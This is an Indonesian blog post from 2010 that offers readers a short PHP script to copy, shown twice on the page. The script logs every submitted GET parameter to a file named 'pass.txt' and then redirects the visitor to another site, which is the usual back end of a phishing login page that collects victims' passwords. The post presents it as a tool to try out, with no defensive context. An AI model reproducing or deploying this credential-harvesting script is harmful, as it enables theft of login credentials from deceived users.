Selasa, 03 Agustus 2010

Scrip php

Bagi yang mau silakan scrip php copy  dibawah ini disini..

beri dasar :

header("Location:http://websku.com");
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);

exit;
?>

selamat mencoba

Related Posts by Categories



Widget by Hoctro | Jack Book

Tidak ada komentar:

Bagi yang mau silakan scrip php copy  dibawah ini disini..

beri dasar :

header("Location:http://websku.com");
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);

exit;
?>

selamat mencoba

Posting Komentar